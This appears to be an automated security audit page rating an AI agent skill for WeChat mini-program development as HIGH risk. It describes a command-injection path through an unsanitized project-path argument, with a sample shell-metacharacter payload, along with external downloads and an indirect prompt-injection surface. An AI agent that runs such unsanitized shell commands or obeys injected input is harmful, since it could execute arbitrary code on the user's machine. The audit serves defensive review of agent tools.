Skills
NYC
skills/tencentcloudbase/skills/miniprogram-development/Gen Agent Trust Hub

miniprogram-development

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to execute local system commands to open WeChat Developer Tools using cli.bat (Windows) or the cli binary (macOS). It uses a placeholder for the project root path (--project "项目根目录路径"). If an attacker provides a project path containing shell metacharacters (e.g., "; malicious_command #"), the agent might execute arbitrary code on the host machine.
  • [EXTERNAL_DOWNLOADS] (LOW): The skill directs the agent to use downloadRemoteFile to fetch assets from https://img.icons8.com. While this serves a functional purpose, it involves downloading content from an external, non-whitelisted domain into the local project environment.
  • [INDIRECT_PROMPT_INJECTION] (LOW): The skill contains a vulnerability surface where untrusted data (like user input or configuration files) is processed.
  • Ingestion points: userInput for AI models, project.config.json fields, and external icons.
  • Boundary markers: None detected in the instructions or code snippets.
  • Capability inventory: Execution of local CLI binaries, file writing, and downloadRemoteFile network operations.
  • Sanitization: No evidence of input validation or path sanitization before passing strings to shell commands or the AI model.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 04:45 PM